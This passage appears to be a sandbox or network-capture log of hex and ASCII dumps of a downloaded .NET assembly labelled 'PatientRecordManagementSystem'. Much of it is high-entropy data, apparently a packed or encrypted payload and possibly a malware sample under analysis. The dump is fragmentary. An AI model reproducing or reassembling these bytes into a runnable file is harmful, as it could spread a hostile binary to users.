2086$1,1,14,1q6.6JEffect53-System.Windows.Media.Effects.DropShadowEffect5.555$Department6$Left=6%$4,113,0,0q6@$Top=6S$266k$
2021-10-16 14:53:37 UTC	236	IN	Data Raw: 32 00 00 00 00 2c 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d 61 6e 61 67 65 6d 65 6e 74 53 79 73 74 65 6d 2e 4d 61 69 6e 4e 61 76 69 67 61 74 69 6f 6e 03 00 00 00 35 01 00 00 00 09 00 00 00 1c 57 01 00 53 50 72 65 73 65 6e 74 61 74 69 6f 6e 43 6f 72 65 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 1c 52 02 00 4e 57 69 6e 64 6f 77 73 42 61 73 65 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 1c 6e 03 00 6a 53 41 50 42 75 73 69 6e 65 73 73 4f 62 6a 65 63 Data Ascii: 2,PatientRecordManagementSystem.MainNavigation5WSPresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35RNWindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35njSAPBusinessObjec
2021-10-16 14:53:37 UTC	247	IN	Data Raw: 00 35 22 00 00 00 0a 00 00 00 2d 07 00 00 00 35 00 00 00 00 00 00 00 00 1f 0b 05 00 09 fe 03 04 4e 61 6d 65 24 0c 05 00 06 6f 70 74 79 65 73 99 fd 35 22 00 00 00 16 00 00 00 24 09 f2 ff 03 59 45 53 99 fd 36 26 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 34 00 00 00 24 11 cf ff 0b 34 34 39 2c 32 33 32 2c 30 2c 30 71 fd 36 4f 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 64 00 00 00 04 03 09 fe 00 35 23 00 00 00 0a 00 00 00 2d 08 00 00 00 35 00 00 00 00 00 00 00 00 24 0b 05 00 05 6f 70 74 6e 6f 99 fd 35 23 00 00 00 16 00 00 00 24 08 f2 ff 02 4e 4f 99 fd 36 25 00 00 00 24 0a d0 ff 04 4c 65 66 74 3d ff 36 32 00 00 00 24 11 cf ff 0b 34 35 30 2c 32 35 32 2c 30 2c 30 71 fd 36 4d 00 00 00 24 09 c8 ff 03 54 6f 70 3d ff 36 62 00 00 00 04 03 f8 fe 00 35 24 00 00 00 0a Data Ascii: 5"-5Name$optyes5"$YES6&$Left=64$449,232,0,0q6O$Top=6d5#-5$optno5#$NO6%$Left=62$450,252,0,0q6M$Top=6b5$
2021-10-16 14:53:37 UTC	263	IN	Data Raw: 8e ff 01 30 99 fd 36 e1 00 00 00 24 14 e5 ff 0e 4f 43 52 20 41 20 45 78 74 65 6e 64 65 64 29 ff 36 ea 00 00 00 2e 8e ff 36 06 01 00 00 07 7a ff 35 54 00 00 00 0e 00 00 00 03 56 fd 00 35 55 00 00 00 12 00 00 00 2e 7e ff 35 56 00 00 00 16 00 00 00 03 de fd 00 04 03 c1 fd 00 35 57 00 00 00 16 00 00 00 24 0d 08 00 07 2d 31 30 2e 36 34 36 51 ff 36 24 00 00 00 04 03 f0 fd 00 35 58 00 00 00 16 00 00 00 04 03 54 fd 00 35 59 00 00 00 16 00 00 00 24 0b 09 00 05 32 2e 36 33 32 51 ff 36 29 00 00 00 04 04 35 5a 00 00 00 13 00 00 00 08 2e 8e ff 35 5b 00 00 00 27 00 00 00 07 05 00 35 5c 00 00 00 0e 00 00 00 03 01 00 00 35 5d 00 00 00 12 00 00 00 04 08 2e 8e ff 35 5e 00 00 00 1e 00 00 00 04 35 5f 00 00 00 0b 00 00 00 03 f8 fe 00 35 60 00 00 00 0a 00 00 00 24 0e bd ff 08 Data Ascii: 06$OCR A Extended)6.6z5TV5U.~5V5W$-10.646Q6$5XT5Y$2.632Q6)5Z.5['5\5].5^5_5`$
2021-10-16 14:53:37 UTC	279	IN	Data Raw: 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 66 78 2f 32 30 30 36 2f 78 61 6d 6c 04 00 01 00 02 00 06 00 04 00 35 03 00 00 00 09 00 00 00 14 40 01 64 32 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 78 70 72 65 73 73 69 6f 6e 2f 62 6c 65 6e 64 2f 32 30 30 38 04 00 01 00 02 00 06 00 04 00 35 04 00 00 00 09 00 00 00 14 4a 02 6d 63 3b 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f 72 67 2f 6d 61 72 6b 75 70 2d 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 2f 32 30 30 36 04 00 01 00 02 00 06 00 04 00 35 05 00 00 00 09 00 00 00 14 3d 05 6c 6f 63 61 6c 2b 63 6c 72 2d 6e 61 6d 65 73 70 61 63 65 3a 50 61 74 69 65 6e 74 52 65 63 6f 72 64 4d Data Ascii: p://schemas.microsoft.com/winfx/2006/xaml5@d2http://schemas.microsoft.com/expression/blend/20085Jmc;http://schemas.openxmlformats.org/markup-compatibility/20065=local+clr-namespace:PatientRecordM
2021-10-16 14:53:37 UTC	295	IN	Data Raw: 3f ef 0b 07 93 ee 50 bf 2b ce 95 25 89 32 57 25 4e 46 21 16 cc 94 17 20 8c f5 4a cd 70 8b 1a 18 8c 92 34 51 b9 52 fe 9d 6a be e3 6e 76 04 6b d8 88 fe 90 f6 c4 26 ff 60 6d 03 8e c1 14 82 3d c8 25 e8 8d 66 01 ed d4 ce 67 cb 93 56 bb a9 d7 2f f3 42 a3 35 0e 3b 17 0c 0a d8 b7 24 d2 26 3a f5 77 60 91 f6 11 5d 56 5e ea 13 61 c5 d4 b3 f7 35 b8 d2 13 5f f6 81 67 a7 af 8c 8c 12 16 1c 1b 4c cd e5 1a e5 87 f4 36 59 ff d4 9a a7 5d 20 3a eb 1b 5f 2f 70 78 be 3c 45 62 c5 bf 51 a4 99 50 63 dc 5d 19 b5 4b a4 d8 6a 72 9f ee b6 96 1e 77 6f 84 2a bd 15 ee 0a ef e4 b9 77 89 29 3e 95 77 a9 75 e1 96 49 70 bb 34 00 9d f9 dc de e5 af 13 84 5d 5b 91 99 54 09 36 86 e8 cc 9d a8 88 1d d6 c7 41 56 9c 5e 89 4f 5c d2 b7 1f 6c 6d 7a 91 e2 c5 73 b8 60 98 8b 8d 6d 03 53 0d b0 c0 26 0a df Data Ascii: ?P+%2W%NF! Jp4QRjnvk&`m=%fgV/B5;$&:w`]V^a5_gL6Y] :_/px<EbQPc]Kjrwo*w)>wuIp4][T6AV^O\lmzs`mS&
2021-10-16 14:53:37 UTC	311	IN	Data Raw: b5 90 5f 5d fd bb bd b6 bb b9 b8 ac 91 b5 b4 9e b2 f2 4f 69 8c c0 cd ca ca 61 ef c7 c6 e8 c4 84 c2 c6 3e 7e 9c dd dc 03 f3 d9 d8 e6 d6 8f d4 d4 d3 c2 2e 4e ad 15 c5 eb ea c4 e8 bc e6 e2 e5 f0 e2 b4 1f 4d bd ee fd 8a fa ee f8 e4 f6 78 f4 e8 f2 e2 0e 6d 4d 12 0c 08 0a 52 0e cb 06 26 04 c8 04 d4 ff 9d 5d fa 1a c1 1a 1a 18 82 11 d9 14 10 12 a0 e8 42 6d 2e 2c e6 2d c4 28 04 26 a2 2c f6 22 02 df 3d 75 e8 3c 18 3a 86 30 e2 36 16 34 ef 3a e4 cf cd 0d b5 44 9e 4a 6a 48 53 4f 90 44 60 42 71 b6 02 1d 7e 5c 17 53 59 59 74 56 3d 5d 57 53 72 af 4a 24 b8 6c 48 6a c9 61 6f 67 46 64 df 6b 6c 9e fd 3d a5 75 87 7a 7a 78 83 7f 64 75 70 72 61 85 e2 cd 8e 8c a7 80 45 88 84 86 cd 8e 97 83 82 7f 5b d7 51 9c b8 9a f8 93 9f 97 b6 94 ed 99 99 6e 0d ed 37 a7 eb ab aa a8 11 ad e5 a5 Data Ascii: _]Oia>~.NMxmMR&]Bm.,-(&,"=u<:064:DJjHSOD`Bq~\SYYtV=]WSrJ$lHjaogFdkl=uzzxdupraE[Qn7
2021-10-16 14:53:37 UTC	327	IN	Data Raw: a2 f1 2d 71 9e d8 cf c8 f7 d6 dc c2 da d0 f7 dc de dd 2a 0d f9 a4 a3 a5 ca 8b 80 b3 89 90 a9 fa a6 f5 4c 29 c4 9b 94 8f a9 97 b2 ee ba a7 b7 a2 98 e0 7e 29 ad a4 a9 85 9f 84 8d 95 87 91 8b 91 e2 b2 66 2d c9 98 91 d5 b9 96 94 9b 93 96 80 9a 9d 9f 7c ae 1f 68 6d 6f 45 67 64 7e 45 6a 68 6f 67 62 8b d7 32 73 5e 7a 69 7c 18 22 78 76 66 46 4a 20 b9 cb 5e 7d 54 19 13 66 70 16 69 4d 53 76 54 54 b7 f1 1e 55 3c 49 6d 74 42 55 5e 5e 5e 5d 42 7f ad af 77 06 23 0a 7d 7f 71 08 71 20 20 72 29 06 fe fe 73 6a 3e 1e 0f 11 34 1c 61 65 3d 15 15 09 c3 a7 5f 1e 36 2a 23 2d 2e 09 31 07 0c 63 32 13 f0 bd 58 0e 0f 36 15 1d 0d 1b 13 75 02 46 31 03 fd 68 ae c6 c9 e9 e6 c0 bf d7 d2 e1 d1 ee c1 e3 0a 53 8d a5 ce ea fd 99 e2 c4 ff ec c6 f4 e8 a5 23 7e db e3 94 e5 f9 d0 e6 d2 d6 e4 93 Data Ascii: -qL)~)f-\|hmoEgd~Ejhogb2s^zi\|"xvfFJ ^}TfpiMSvTTU<ImtBU^^^]Bw#}qq r)sj>4ae=_6#-.1c2X6uF1hS#~
2021-10-16 14:53:37 UTC	343	IN	Data Raw: d2 fb 2e 7e 8d cd cc cb d6 c9 f4 9f c6 d7 ee c3 c2 c0 2c 2e fb bd b4 ba ba b9 a6 b7 b6 a4 9f aa 4c bd 46 0e a8 a9 ac ab aa bf a8 a7 a6 74 a4 a3 a2 e7 5f 3e dd 14 9c 9b 9a 99 e6 02 96 95 90 b3 6f 6e 90 d1 e5 17 8d 8b 8c 77 86 8e 86 ae 55 95 91 85 47 1f 3d 7d 7c 05 a5 79 78 73 71 64 70 e9 5a 35 8d ce 2b 7e 69 63 79 6f 16 f2 66 65 60 43 9c 9e 60 01 35 c7 5d 5b 5c a7 56 5e 56 7e f5 42 56 42 a8 ff 08 59 b2 4a 59 41 59 4f 6a 39 3a 89 42 41 bb 99 6c 39 a6 13 2d 3b 38 31 45 69 34 33 38 4b d8 a5 6e 3b 07 2b 06 8c 56 b2 26 25 20 03 dd de 20 41 75 87 1d 1b 1c e7 16 1e 16 2d 4a ec ed ee ef b9 c0 09 0c 0b 0b 2c 1e 79 e6 05 04 07 7c 4e ff 5e b9 d5 b5 f9 fa ff e7 e4 6c 57 ff f4 7c 98 18 94 ba 3b 61 ef ea e9 e9 eb e1 6b 8d f4 38 ec 61 eb 9d dd d8 fb da d9 d8 d7 fe 4f d5 Data Ascii: .~,.LFt_>onwUG=}\|yxsqdpZ5+~icyofe`C`5][\V^V~BVBYJYAYOj9:BAl9-;81Ei438Kn;+V&% Au-J,y\|N^lW\|;ak8aO
2021-10-16 14:53:37 UTC	359	IN	Data Raw: a0 a6 29 6e fd e5 45 ca ca cf 6a e2 d9 d9 b6 52 c4 c1 4f 36 74 bc bc bd 18 b2 c6 22 b6 b5 b0 93 4c 4e b0 f1 c5 37 ad ab ac 57 a6 a5 a6 9d a2 5d 5d 5e 58 3c 47 97 e2 0e 9a 99 9c b7 69 6a 6b 6c ba 0b 6e 2e cb 73 82 89 8a b1 62 7a 79 7a af 83 84 ab 6c ee 39 7d 63 7b 7a 79 44 77 76 64 74 0d a8 71 8f ca 5f c0 6a 6b 1a 41 e1 66 66 63 4c 9b 62 61 99 d6 28 5f 5c 5d 50 72 58 51 7c 55 47 63 50 51 bf ee 0d 4d 44 4b 4a 58 48 35 3d 47 44 33 6a c8 be 9e 7b 37 17 3b 3c 13 2b 07 34 35 24 33 32 31 c7 8e 6d 3c 2c 59 9f 2f 28 57 0e ac 25 23 24 2b f4 be 5b 37 02 19 32 1c 18 17 1c 3f 07 23 11 11 f6 ae 4d 0d 09 0b 0a 18 08 79 24 04 04 07 00 29 8a 5d bd fb 93 40 fa f9 f2 e1 08 f7 fe d8 f2 f7 25 4e ad ed ff db ee e9 f3 e7 e6 e5 e1 e3 e2 f0 1f 00 46 dd dc df d8 f1 2c d7 d6 d3 fc Data Ascii: )nEjRO6t"LN7W]]^X<Gijkln.sbzyzl9}c{zyDwvdtq_jkAffcLba(_\]PrXQ\|UGcPQMDKJXH5=GD3j{7;<+45$321m<,Y/(W%#$+[72?#My$)]@%NF,
2021-10-16 14:53:37 UTC	375	IN	Data Raw: c1 d1 bb 77 5a c6 df cb 54 d0 14 cc d5 c5 6c da 23 ca 2c 1e 4f a4 5a b0 a9 b9 04 ae 5d be a7 b3 77 a8 bf 05 fe ad 63 b2 5f a2 bb a7 7f bc 5e a8 b1 a1 bc 27 27 96 8f 9b 77 80 67 9c 85 95 62 8a 96 9d 7c 2e 32 94 85 87 99 89 80 9d 88 89 97 83 93 9b 6c d2 2e 7d 66 61 62 75 6b 77 55 6f 69 7f 61 71 a2 d4 0f 61 7f 6b 5d 73 4f 6b 75 65 25 79 4e 6d 8c fe 57 47 6d 57 49 59 0c 4d 60 59 47 53 0c 4b 94 e2 1e 4d 24 51 0a 45 5b 47 34 5f 01 4f 51 41 c4 84 37 31 2f 3b be 23 77 3b 25 35 b9 29 66 3d dc 8e fa 37 75 27 39 29 89 3d 78 29 37 23 89 3b bc b2 4e 1d a9 01 72 15 0b 17 a8 0f 79 1f 01 11 27 b4 3f 01 1f 0b d8 13 7f 0b 15 05 df 19 75 0d ec 5e 59 e7 80 f7 e9 f9 16 ed 77 f9 e7 f3 0a eb 89 42 be ed ed f0 61 e5 fb e7 ed fe 74 ef 36 31 1f 7e 9d dd da c3 cf c2 c6 d6 d7 d5 08 Data Ascii: wZTl#,OZ]wc_^''wgb\|.2l.}fabukwUoiaqak]sOkue%yNmWGmWIYM`YGSKM$QE[G4_OQA71/;#w;%5)f=7u'9)=x)7#;Nry'?u^YwBat61~
2021-10-16 14:53:37 UTC	391	IN	Data Raw: c3 d1 c9 48 10 c1 dd cb 3c ef 8c c6 df c5 3a e5 61 cd 26 1e f0 9a 14 b7 9b b9 a5 90 04 b9 95 b3 9d 96 f6 02 cc ad 90 8c e3 a8 89 a7 ef 82 1a af 83 a1 0b 19 19 91 bd 9b c5 be 53 9b b7 95 e4 b4 b5 93 5e 2e b1 aa 5f 87 bb 89 f4 a0 5f 89 b5 83 fe a6 a0 d2 04 7d 69 60 51 7b 39 77 63 6e 93 7f 33 71 04 e9 c3 61 3d 6b ff 4e 9d 6b 37 65 c2 44 2b 60 ce fe ae 7a a6 57 03 59 4d 4c 48 54 35 53 47 4a b1 ef 64 4d 59 50 4a 44 c9 47 01 5e 0d 42 cb 41 03 b9 7b 30 b5 3b f9 1e e3 3f bf 35 fd 14 ec 32 46 8e bd 0a 65 2a a3 29 e1 00 b6 27 ad 23 eb 06 d3 b3 d4 1d 28 00 0e 14 91 17 22 0e 60 11 9b 11 37 89 17 0f 85 0b ec 2e 1c 0a 8f 05 f5 24 1e 0c 76 5e 44 da d8 f6 73 f9 fb df b6 f4 7d f3 fc d9 1b 43 24 ed fb c3 c0 e4 61 e7 f9 cd 32 e6 6b e1 58 65 d4 dc 55 db fd f1 eb da 5f d5 68 Data Ascii: H<:a&S^.__}i`Q{9wcn3qa=kNk7eD+`zWYMLHT5SGJdMYPJDG^BA{0;?52Fe*)'#("`7.$v^Ds}C$a2kXeU_h
2021-10-16 14:53:37 UTC	407	IN	Data Raw: 96 d1 48 0b f9 92 85 b8 8b bb ba a6 bf c5 87 b1 a7 a0 4b 7b b4 d3 cf cf db d7 db d2 b6 f2 d1 c7 fd d3 25 6b 8e d9 ac ec cf dd ed c9 d2 d7 dd e2 d1 d2 3a 53 bf f1 e5 9b fd fc ec c8 da fa f7 f2 e6 f8 00 40 cd ca e9 ff de f0 f8 e2 f5 85 c2 ec f0 ec 1e aa 3d 38 11 0b 0e 00 78 34 19 1b 17 12 06 71 db a1 61 02 1b 0e 18 69 21 14 28 10 08 0f 2d 13 da 93 6d 29 25 5b 09 2d 39 25 22 26 03 3a 26 39 af a7 63 29 29 33 05 2f 48 14 33 27 37 37 30 28 d1 f9 7d 5a 59 4f 65 75 5d 59 51 41 5c 33 77 5f ab fd 3a 44 58 43 2a 6a 47 4a 56 44 56 46 22 73 ba ce 31 7c 7f 7e 1a 4d 77 54 7e 74 66 52 60 63 8e d7 4d 59 7e 62 67 09 4b 68 68 71 65 6a 6c 72 ff 39 d8 89 a3 b8 92 98 8a 84 f6 a2 86 9a 86 94 0f 0a c8 81 8d 92 ea be 89 8e 92 e5 a1 9b 8b 92 6b 0d 9d 8a ae b2 ae bc 99 bb ba 81 b1 Data Ascii: HK{%k:S@=8x4qai!(-m)%[-9%"&:&9c))3/H3'770(}ZYOeu]YQA\3w_:DXC*jGJVDVF"s1\|~MwT~tfR`cMY~bgKhhqejlr9k
2021-10-16 14:53:37 UTC	423	IN	Data Raw: 78 ba 46 88 79 ba 46 88 7a ba 46 88 7b ba 46 88 7c ba 46 88 7d ba 46 88 7e ba 46 88 7f ba 46 88 90 bc 46 88 91 bc 46 88 92 bc 46 88 93 bc 46 88 94 bc 46 88 95 bc 46 88 96 bc 46 88 97 bc 46 88 98 bc 46 88 99 bc 46 88 d0 bc 46 88 d1 bc 46 88 d2 bc 46 88 d3 bc 46 88 d4 bc 46 88 d5 bc 46 88 d6 bc 46 88 d7 bc 46 88 da bc 46 88 db bc 46 88 f0 bc 46 88 f1 bc 46 88 f2 bc 46 88 f3 bc 46 88 f4 bc 46 88 f5 bc 46 88 f6 bc 46 88 f7 bc 46 88 f8 bc 46 88 f9 bc 46 88 10 bd 46 88 11 bd 46 88 12 bd 46 88 13 bd 46 88 14 bd 46 88 15 bd 46 88 16 bd 46 88 17 bd 46 88 1c bd 46 88 1d bd 46 88 30 bd 46 88 31 bd 46 88 32 bd 46 88 33 bd 46 88 34 bd 46 88 35 bd 46 88 36 bd 46 88 37 bd 46 88 3a bd 46 88 3b bd 46 88 50 bd 46 88 51 bd 46 88 52 bd 46 88 53 bd 46 88 54 bd 46 88 55 bd 46 Data Ascii: xFyFzF{F\|F}F~FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0F1F2F3F4F5F6F7F:F;FPFQFRFSFTFUF
2021-10-16 14:53:37 UTC	439	IN	Data Raw: 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 30 00 c2 21 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 31 00 4b 39 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 32 00 d4 50 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 33 00 5d 68 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 34 00 e6 7f 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 35 00 6f 97 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 36 00 f8 ae 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 37 00 81 c6 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 32 00 39 00 38 00 0a de 1c 00 16 37 00 30 00 39 00 34 00 65 00 65 Data Ascii: 7094ee76290!7094ee76291K97094ee76292P7094ee76293]h7094ee762947094ee76295o7094ee762967094ee762977094ee762987094ee
2021-10-16 14:53:37 UTC	455	IN	Data Raw: 30 00 bd 4d 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 31 00 46 65 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 32 00 cf 7c 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 33 00 58 94 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 34 00 e1 ab 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 35 00 6a c3 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 36 00 f3 da 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 37 00 7c f2 54 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 38 00 05 0a 55 00 16 37 00 30 00 39 00 34 00 65 00 65 00 37 00 36 00 38 00 34 00 39 00 8e 21 55 00 14 37 00 30 00 39 Data Ascii: 0MT7094ee76841FeT7094ee76842\|T7094ee76843XT7094ee76844T7094ee76845jT7094ee76846T7094ee76847\|T7094ee76848U7094ee76849!U709
2021-10-16 14:53:37 UTC	471	IN	Data Raw: 5b fd cb 93 0b a9 a5 20 ce 9d be db 12 55 43 86 f1 4d 5c 0b 98 81 03 e1 53 c7 08 35 7d d5 38 7d 63 90 be 30 fe e9 71 93 46 86 80 16 e4 cc 14 42 46 8e 70 b1 7e 86 fd 49 39 ee 5a 31 18 ec eb 3d 1c 98 e3 c5 c6 73 73 9d fc 20 a8 71 7f 9b 75 8b df f1 1a 75 83 22 78 3b 0d d4 ad 47 66 c9 61 71 2f 06 d8 0a ca e0 a6 e4 ad b5 5f 83 d3 b1 ef 93 78 cd eb f0 24 3f 63 b0 c1 87 92 34 b0 5b 41 ac 4a de 00 bc 36 18 36 8d 51 8b 63 68 ef 45 b2 20 a1 5b 02 d3 70 e2 40 51 f3 cb bf a5 c3 5b 61 a3 6a 6c 8c ca 86 a8 e3 72 ac a4 0b a2 f2 3b f9 cc d5 4f f7 6d c2 34 1c 17 41 25 6a 0f 74 7c 25 53 49 2e c0 42 44 6e cd e2 9c 5f 78 04 db 6e a0 56 18 2f ec 7a a2 d8 ac 5e 78 37 e5 22 30 de 5c c2 12 65 0e 5c 71 1d 46 3a 10 7a e8 ae a7 a9 aa 0c c0 f6 7d fe 53 d1 02 d9 e1 70 41 0d 0f 00 00 Data Ascii: [ UCM\S5}8}c0qFBFp~I9Z1=ss quu"x;Gfaq/_x$?c4[AJ66QchE [p@Q[ajlr;Om4A%jt\|%SI.BDn_xnV/z^x7"0\e\qF:z}SpA
2021-10-16 14:53:37 UTC	487	IN	Data Raw: 1a 7c 87 78 15 3a e8 1d e2 96 3c 11 01 f2 4f d9 a9 55 88 2d 08 02 b6 aa 9f 13 bf c4 78 b2 d3 44 e8 93 4e 6a 57 b6 ee 23 e7 56 e9 db 08 8b 62 d6 46 5d da 98 ba a5 2f eb 46 a1 61 24 3e 84 32 79 73 7d 3b 33 6b 67 88 7b 40 aa b3 fe 21 4c f4 68 2e 22 0f 0a e2 ae b5 fa 3b aa 2a 58 f4 8a 75 16 33 c0 a3 54 40 91 cf cc 5c 53 c4 a5 91 53 51 44 a9 c7 10 8c bf 89 be 55 f7 24 52 29 44 9c c8 d0 5c ce 1b 0a 0e 96 69 ab 7a 58 50 3d 6a 37 bf 70 5b 84 8b d0 a8 8a 4d 3b 48 86 60 64 31 99 0c f2 8b 9a 2e 97 5b b3 c6 60 dd 40 58 32 b1 08 d3 e0 cd fd 58 45 69 ba cd 4b 26 4e ec 1d 76 a6 c1 7a d5 8a e0 18 5e 00 20 61 0e de 9b b9 a6 ac 8c f6 10 a0 53 f9 55 2a d9 02 b7 fa b0 76 14 7d cf a8 98 4f b0 40 ca 1a 95 51 49 bf 0e b2 4c 88 e9 85 4c 4d 94 a0 c4 66 30 35 b7 c8 a2 c6 1c 92 e3 Data Ascii: \|x:<OU-xDNjW#VbF]/Fa$>2ys};3kg{@!Lh.";Xu3T@\SSQDU$R)D\izXP=j7p[M;H`d1.[`@X2XEiK&Nvz^ aSUv}O@QILLMf05
2021-10-16 14:53:37 UTC	503	IN	Data Raw: 58 1e a6 74 36 ca 14 1e 3e 27 b1 2f bc bf 23 f0 73 27 9b c2 fa 12 9e ad 24 10 58 1e 69 38 53 41 cf 69 d5 ba a5 41 e7 dc ef 48 3c 07 71 ce 1d 0c 37 9a 2a 12 37 b2 47 61 eb 77 fc fb 8a 03 a8 80 d9 4f 60 1c 01 28 b5 3c 4b c5 94 f0 68 b0 a4 2e 21 20 e1 73 ff 57 b8 bb 79 bd ef 01 91 70 a4 6d 1b 79 86 43 14 a2 4d 2a 87 4d 3d 9f e6 65 2b d1 54 16 63 dd 60 22 11 21 44 06 ea 8d f1 95 02 3d f1 c2 0d 8a 40 b2 53 6a c3 5a e1 59 b7 48 73 fc 44 73 97 f4 bd 1f b6 39 53 75 db a7 5a e4 3c dc de 95 fc 78 9e 09 84 ac ba 62 2a 18 22 ac 19 a1 e1 59 f8 cd f6 ef 5c cd ed 77 32 a5 51 a2 be d6 0f 19 6a 60 43 52 9e e4 40 28 c0 e5 fe 74 27 db 56 f5 98 2e 1d da 6e 1b 8a 0f 6f ae 36 91 76 57 9d bb 2c 3c f8 92 6d c6 45 9f 25 4d 18 ac c3 8c e0 b8 37 1c 47 94 d4 d9 88 76 7c 76 ac e7 8d Data Ascii: Xt6>'/#s'$Xi8SAiAH<q77GawO`(<Kh.! sWypmyCMM=e+Tc`"!D=@SjZYHsDs9SuZ<xb*"Y\w2Qj`CR@(t'V.no6vW,<mE%M7Gv\|v
2021-10-16 14:53:37 UTC	519	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	535	IN	Data Raw: d1 c6 e5 46 0d 09 c0 53 16 59 7f ba 60 9f 7e ec a4 c4 80 45 ae 2d 82 50 31 9d a8 6a 6e 59 c4 45 bf 3f 18 58 8e e1 a6 13 15 a8 91 74 59 27 e4 c7 e1 36 62 78 ae ce 60 c2 3a 35 8e f9 70 fa 49 6d 36 54 09 94 ec 0d 13 7b ff 6e b7 9a 35 88 19 49 98 13 33 1e 5e 6c a9 c8 47 37 be 84 88 f2 ed 97 f3 56 63 5f c5 be dd 2f e8 7e ec 17 30 01 33 6c 4a 3f 9a b0 b4 cc d7 c4 4f c4 20 a9 58 df af 34 eb c3 af 40 ee 35 3f 06 25 ce a0 81 97 d5 c9 db e3 9f 1c 9a 02 c4 ad 2e ba fa 20 81 47 2e 53 7e 3c c8 6e 75 bf 3b c7 3f 14 9d 12 7f d0 1e 10 11 df 62 af 04 7a c9 d9 23 98 87 a1 7f 1a ea 30 fd 93 79 1e ef 6b f9 5e bf 95 9f 5b dd 4e 62 65 d9 fe d4 96 3b 7d 23 c3 c3 92 9f 24 ba 4a cc 60 42 4d fa c4 20 66 3d 35 bb 67 21 66 07 1a 51 ad 97 a6 f9 49 ed fe 0a 88 1b 1f d3 b6 b5 df 1a 08 Data Ascii: FSY`~E-P1jnYE?XtY'6bx`:5pIm6T{n5I3^lG7Vc_/~03lJ?O X4@5?%. G.S~<nu;?bz#0yk^[Nbe;}#$J`BM f=5g!fQI
2021-10-16 14:53:37 UTC	551	IN	Data Raw: 4f 52 32 d5 45 7e 2d eb 92 6b a2 ac 9e 2b d3 be e3 6b 13 39 11 de 11 39 08 40 5e 0d 75 ae d6 d6 fd 5c 25 c1 3c 53 eb 5d 1c 25 d8 03 75 f5 59 30 55 3b 83 95 a1 06 3f d8 3e 6e b1 45 85 bb 5d 29 8c 8f 61 68 92 ca 2c fb 5a e7 31 60 08 70 53 d7 a2 64 9c 87 1a 79 bc 67 64 47 4a d2 cc f0 22 38 3c c5 30 52 7c 49 5c 10 07 bc 11 64 3a be d7 c8 3b 41 e8 d5 c6 de 1f d5 4b c6 59 10 84 62 37 a4 ea bd eb fd df 37 d8 8b 46 ed 97 8c bc 91 67 09 7c 13 c8 90 72 fd dc 90 a8 d3 a8 59 57 b8 1d 2f e8 85 f9 b6 a5 18 1e b1 c7 71 e5 3f c7 17 b9 90 61 f5 4e 27 d4 94 52 57 ad 44 9f fd 66 f9 38 90 90 c8 f8 63 de ba fc 10 9c a8 cc 22 29 6e fa 80 